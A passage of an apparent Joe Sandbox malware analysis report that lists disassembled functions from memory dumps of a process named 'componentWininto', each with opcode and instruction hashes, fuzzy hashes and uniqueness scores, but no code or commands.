                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 112f03ae5c40c7921f4e94766db799d1f458bf9268f1f292e8ea8696fea2e1da
                                                  • Instruction ID: 3e8ed6113e60b63c6a2e33e790a96456bb8aedc8f4f2a8cdefa6fcb5973fadaa
                                                  • Opcode Fuzzy Hash: 112f03ae5c40c7921f4e94766db799d1f458bf9268f1f292e8ea8696fea2e1da
                                                  • Instruction Fuzzy Hash: 7411043094A58E5FDB59EB6488695FA7BE0EF19300F0104BBD41DC71A2DE795781C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBEA61 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0c2bf9b37718258ab73f75131b0ee459a62ad16b036cfcb0d5cd043b15a5611
                                                  • Instruction ID: 322fbfa20f1ef25ae9adb269c73ccf202ec19d041595c676a6c207907861872d
                                                  • Opcode Fuzzy Hash: f0c2bf9b37718258ab73f75131b0ee459a62ad16b036cfcb0d5cd043b15a5611
                                                  • Instruction Fuzzy Hash: 1821A415A4F3DA4FE7AB42B408340643FA59F43220B0E45FBD08ACF0E3D94C5D4A9366
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD0A01 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3a1004cb45196158d570a82494b13770b90421ffbcf5eb238ff11d72d1f49d4
                                                  • Instruction ID: 70c0ecfd7ae9e6c7085edd703bd0ec78154eb36a6487f5b6791944c713a71711
                                                  • Opcode Fuzzy Hash: a3a1004cb45196158d570a82494b13770b90421ffbcf5eb238ff11d72d1f49d4
                                                  • Instruction Fuzzy Hash: C7119031A0950E4FE7A0EFA888691BD77E0FF98700F4146B6D41CC60B6EE74A540C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBF36B Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01886d64256ce186beba26d4da0edc2edf68dc830d869ecaf2098d1a5a53c563
                                                  • Instruction ID: 161976d56d435be5a9ec465dfa77f37a73afb86111b6ed4f2ac79c5e13345163
                                                  • Opcode Fuzzy Hash: 01886d64256ce186beba26d4da0edc2edf68dc830d869ecaf2098d1a5a53c563
                                                  • Instruction Fuzzy Hash: 5911E131A0AA5A8FDB2DAB6490614F573A1EF54365B40163AD00FC76E2CF38A501CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE23D1 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3dc4b157d5d800027c49e6626d0e811cce4ec0509f4779b6ac603412097a720f
                                                  • Instruction ID: 279d9c3d107678bfd9fd4c4f72c792a117652304c1190bd1adf7aefc14fc1f3b
                                                  • Opcode Fuzzy Hash: 3dc4b157d5d800027c49e6626d0e811cce4ec0509f4779b6ac603412097a720f
                                                  • Instruction Fuzzy Hash: B6118B30A1924D8FDB58DF58C4A55E93BA1FF58304F52027EE80EC3295CB75A650CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE4735 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fad4be32b184b960ccd7139910ada07170311014a4e5cb2f68bed32cd5ef3887
                                                  • Instruction ID: 9bc9acd15d73d43e1c1e34e763854f931f68a7bdf0c34298dcb138dd42bd2e28
                                                  • Opcode Fuzzy Hash: fad4be32b184b960ccd7139910ada07170311014a4e5cb2f68bed32cd5ef3887
                                                  • Instruction Fuzzy Hash: 7011B130A0964E8FEBA8EF6884692BD7BE1FF59301F1105BED41DC61A6DF74A140C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEB472 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d365e5d055fd360deed72a46475d1fc3d5df20b1139af0f76dae4155d46c3a5
                                                  • Instruction ID: 9c4968194278a29e03b1fe30394596b8802da6f5e826dc63cf96be204028ddb8
                                                  • Opcode Fuzzy Hash: 9d365e5d055fd360deed72a46475d1fc3d5df20b1139af0f76dae4155d46c3a5
                                                  • Instruction Fuzzy Hash: 2A219221A0F2CA4FE33B53A454B82783F506F46310F9A41FBE58A8A0F3DC8C16459362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE6D45 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa4dbe090051abe026cd14dc1576b5d405a08889b05a9475ba3539a17dbc7f78
                                                  • Instruction ID: 2c00a42962674a2df52d8a0b5e819f4e1cc1c60f702777f231b9553af8251201
                                                  • Opcode Fuzzy Hash: fa4dbe090051abe026cd14dc1576b5d405a08889b05a9475ba3539a17dbc7f78
                                                  • Instruction Fuzzy Hash: E6110330A09A4E8FDBA8EF6884A92FD3BE0FF68301F4005BED41DC61A6DE74A140C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAED7E0 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef1881e287c2e0c7e9daed19965d8801df31afee215ccb50af41f5e7b4578d37
                                                  • Instruction ID: 1d57a6e06a65f1e7399800ca61f6dabc328dcf98414d8133ec2425d6939f9790
                                                  • Opcode Fuzzy Hash: ef1881e287c2e0c7e9daed19965d8801df31afee215ccb50af41f5e7b4578d37
                                                  • Instruction Fuzzy Hash: F211E331B0AA0E8FEB68EBA494615FA73A1EF54355B41063AD05EC71E2CE78B905C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB6F10 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8e6243e27fb430815508279abedf8be8c323fce18527acf3cc966be690905ab
                                                  • Instruction ID: 18ceebf457bedd47b1470db5616b07fcbae1b96968a16cceecbc1d80c45041b4
                                                  • Opcode Fuzzy Hash: e8e6243e27fb430815508279abedf8be8c323fce18527acf3cc966be690905ab
                                                  • Instruction Fuzzy Hash: AE112E31B0AA1E4FDB68EB6094215F573A1EF54365B40453AD04FC31E2CE38F5058B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD122D Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23d673f438e4401cb7ac1348c8a53dc9477e8c996bb9234aaf1395a8376107f7
                                                  • Instruction ID: 01ce32b851844fb5f92044908da638e7e4a5afd9d62edcd11ba3177dccce44a0
                                                  • Opcode Fuzzy Hash: 23d673f438e4401cb7ac1348c8a53dc9477e8c996bb9234aaf1395a8376107f7
                                                  • Instruction Fuzzy Hash: A911B670A0A64E4FEB699BA8C4A96B97BE0FFA9310F4106BED41DC61E1DE766540C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE4699 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7a4176b69f9750a37cef589a64a58972f66be9f422c50434e13981586a981c6
                                                  • Instruction ID: 54e67341bd39ce4fbd458651db9f9b4fa53a8b244365caeb7f3e3a8d7324e360
                                                  • Opcode Fuzzy Hash: c7a4176b69f9750a37cef589a64a58972f66be9f422c50434e13981586a981c6
                                                  • Instruction Fuzzy Hash: AF11C030A0A64E8FDB69EF6884652BD3BA0FF59300F0105BED41DC75A2DF75A540C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF2850 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de17fa180794d37f0f757179337872093446905843da8c9c634cb210f31cdd67
                                                  • Instruction ID: 58ea406d82ebb1b65734063fee94624a2ff257e0504e03ec401d4360e2a3ac04
                                                  • Opcode Fuzzy Hash: de17fa180794d37f0f757179337872093446905843da8c9c634cb210f31cdd67
                                                  • Instruction Fuzzy Hash: 5311E731B09B0E8FEB64EBA4C4619F973A1EF54354B40463AE04FC71E2DE38B9058790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE4BD5 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b78f4e3cf4b96b62c9c92e66fae8f19ce4817d4f018373f1d1c25806c63acd35
                                                  • Instruction ID: d917f5b6bdc1eb605a9787d32277523be7b2efb6cff3118fd41fd8a8262bf727
                                                  • Opcode Fuzzy Hash: b78f4e3cf4b96b62c9c92e66fae8f19ce4817d4f018373f1d1c25806c63acd35
                                                  • Instruction Fuzzy Hash: 80110471E0EA8D4BEB68DBA488752BC7AD0EF95304F0644BED01DC70F2DEA56504C702
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE6DE5 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6014a35d307a1e861705bc6c16b477abdcb6d44b7a3df63fb1bfd1683bed5540
                                                  • Instruction ID: 4df3b56ad3dceac669311a7bcef657e5f5edfaa5c624552a5ab9ff7431a66d69
                                                  • Opcode Fuzzy Hash: 6014a35d307a1e861705bc6c16b477abdcb6d44b7a3df63fb1bfd1683bed5540
                                                  • Instruction Fuzzy Hash: 5C110831A0EA4D8FEB69DF58C4B62B87B91FF15300F0544BED45DC61E2DE656510C701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBF1D9 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4f2a095ad92134beece66241615953bb10559c89530d5766a95d692bf9c3d1b
                                                  • Instruction ID: 04baa4dcc4d17aec235fa748dbe747f7064642a7afe3e4edc1b3ade21cbefdee
                                                  • Opcode Fuzzy Hash: a4f2a095ad92134beece66241615953bb10559c89530d5766a95d692bf9c3d1b
                                                  • Instruction Fuzzy Hash: FD112532B46A5ACFEB299A58D4652F473A1EF51361F11053AD42AC73E1CB39A950CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAED65E Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4484c5711a22cacf99c6c1ab4cf2f58b854b728acd5b373ed9ae506f380abf3d
                                                  • Instruction ID: 6aea9a0346beb97a263e31bb2732fe727ed47898d0226b351c06e396d681e550
                                                  • Opcode Fuzzy Hash: 4484c5711a22cacf99c6c1ab4cf2f58b854b728acd5b373ed9ae506f380abf3d
                                                  • Instruction Fuzzy Hash: 56116B3270AA0B8FEB15AF58D4656F573A0EF55351F11053AD42DC32E1CF78A950C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC8D0 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac78128da0140df51d0801c1323a087182c499ed8b8d9baf4c3a6cc79dc9d084
                                                  • Instruction ID: e53e7577e2adf2c51d559302d5061aa152083ce4fddf8e2bbb26609acc2b7345
                                                  • Opcode Fuzzy Hash: ac78128da0140df51d0801c1323a087182c499ed8b8d9baf4c3a6cc79dc9d084
                                                  • Instruction Fuzzy Hash: EB119030A0964E8FDB56EF64C4692B97BA0FF09304F4106BBE419C71A2EA786640C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB6D8E Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea21906b90699995b3e7afdafeab6e1a7f188fa64d74bc40da5385e3d7b17842
                                                  • Instruction ID: 56e41cb77875a71af4dfcd28032fcc014fc8668e39b05d69a627c3b35536001f
                                                  • Opcode Fuzzy Hash: ea21906b90699995b3e7afdafeab6e1a7f188fa64d74bc40da5385e3d7b17842
                                                  • Instruction Fuzzy Hash: 4111443270A60B8FEB299A98D4656F4B3A1EF55361F11413AD81EC32E1CF29E950CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE4F49 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24453a530b94c1b6905936a2a649a1e27e91fbfa6d56be98180a6d726b8c3c8a
                                                  • Instruction ID: ae9800e0d81de7eb472b16286c5f2d0e4264f5f02c4f6751c4f953912fc41071
                                                  • Opcode Fuzzy Hash: 24453a530b94c1b6905936a2a649a1e27e91fbfa6d56be98180a6d726b8c3c8a
                                                  • Instruction Fuzzy Hash: 79119030A0A68E4FDB69EBA488696BD7BE0FF19304F0105BED41DCA1B2DE756544C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF26CE Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9ee0211d627d57cbe3bb49e63dbfbe2460d5a58c459a9d85f22b4bd7b4b9491
                                                  • Instruction ID: 4f1df9b883c58257a395c125b3ed56e457c67db1c02685a3ea34c555c2956346
                                                  • Opcode Fuzzy Hash: d9ee0211d627d57cbe3bb49e63dbfbe2460d5a58c459a9d85f22b4bd7b4b9491
                                                  • Instruction Fuzzy Hash: 2E11663170A70B8FEB299F98D4652F533A0EF54350F51013AE81AC32E1CFB9AA50C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE3670 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db18a086bf898b7d2c89553138f1b0c6313254d56c95c9b8559cd06970d86d48
                                                  • Instruction ID: 7e77559cf5845f85d86370559c7dbf94f3fd70da37f5c2360441730446b90988
                                                  • Opcode Fuzzy Hash: db18a086bf898b7d2c89553138f1b0c6313254d56c95c9b8559cd06970d86d48
                                                  • Instruction Fuzzy Hash: 0211BF20A0E68E4EE762E77488685EA7BF0FF16304F0645B7D45CCA1E7DE74A6448701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE2841 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73eccea6c767341275956127d9875661ca0fb5739b0b752b765e9ee9bf0ffb83
                                                  • Instruction ID: 69027a00ebe854bd5d592c9c7e2be8cdb696ec367ef90c1f380c01b63db51423
                                                  • Opcode Fuzzy Hash: 73eccea6c767341275956127d9875661ca0fb5739b0b752b765e9ee9bf0ffb83
                                                  • Instruction Fuzzy Hash: E5018430A0964E9FE795FBA484585F97BE0EF59300F4545B6D418C70A6EE74D244C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE73B1 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8586868a2dc5172d14cf94af3e99e7ff0ee5eba1172157b37d5fcc067a92449c
                                                  • Instruction ID: 177a07121a62b1ef243d6b5271ae830ee09a5921a0f5f44656de797a967c099a
                                                  • Opcode Fuzzy Hash: 8586868a2dc5172d14cf94af3e99e7ff0ee5eba1172157b37d5fcc067a92449c
                                                  • Instruction Fuzzy Hash: 7911A130A0A54E8FE751EBB4C85C6FA7BF0FF19300F0108B6D418C70A1DA74A684C711
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9FE8 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 888198910535be4d008c7845e75a25a3450e5f294c4eb57d07c95f3c23491d07
                                                  • Instruction ID: a99985f7e9d693bd379e09d30aa067ca3304c354c755b80b16bdfccd844658cc
                                                  • Opcode Fuzzy Hash: 888198910535be4d008c7845e75a25a3450e5f294c4eb57d07c95f3c23491d07
                                                  • Instruction Fuzzy Hash: DE118071F0E95E4FE79CE7A884A54F83BA1EF48324B15067DD01FC7296DD2868018B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE87F8 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa951e97c5d04157600fc8af66348a45f29831ace01bf77c159aee047ace12d6
                                                  • Instruction ID: 83003575ee72ae8e23124ad3a65a8f67b1332b3d40f4efefc00f05906f9ad718
                                                  • Opcode Fuzzy Hash: fa951e97c5d04157600fc8af66348a45f29831ace01bf77c159aee047ace12d6
                                                  • Instruction Fuzzy Hash: EE114C30A04A0E9FDB99EF68C4596F97BE0FF58305F10457AE41DD21A4CB74A250CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE5FE9 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a5c8226644f9122c285ee1ce1a2062c27dedc20f3c2e2b487691619256b98f1
                                                  • Instruction ID: 57446eeb547375fdb182947b00205b4ddf2827c981822433440fd491e28d4b3e
                                                  • Opcode Fuzzy Hash: 5a5c8226644f9122c285ee1ce1a2062c27dedc20f3c2e2b487691619256b98f1
                                                  • Instruction Fuzzy Hash: C711A330A0E65E5FE761EBA888696A97BF0FF19310F0649B6D45CC60A3EE74A6448701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBCB58 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52f9ea5b4b37ad559c39b18ccb1b1af95a412c3701158adcaef716ab714ad5dd
                                                  • Instruction ID: ebd8a40fdfb259788033811ddacfefb1f5baa97f14dbddaed6104b883672df82
                                                  • Opcode Fuzzy Hash: 52f9ea5b4b37ad559c39b18ccb1b1af95a412c3701158adcaef716ab714ad5dd
                                                  • Instruction Fuzzy Hash: 56018430A1560D8FDB18FF68C4599B977E4FF18304F115A76E85EC35E5DE34B1508A81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD2E2A Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8da982451667f711f5050d0c75185ac47906a860b6084ad65ae726b00efd521e
                                                  • Instruction ID: d887d3d839632460cd6d7c5c24f875969f66129d9ab8b1dde70a5f960563f415
                                                  • Opcode Fuzzy Hash: 8da982451667f711f5050d0c75185ac47906a860b6084ad65ae726b00efd521e
                                                  • Instruction Fuzzy Hash: 42014030A5E68E4FE765ABA4C4685E97FF0EF56300F0646BAD448C70B6EE78A544C701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE4EBD Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
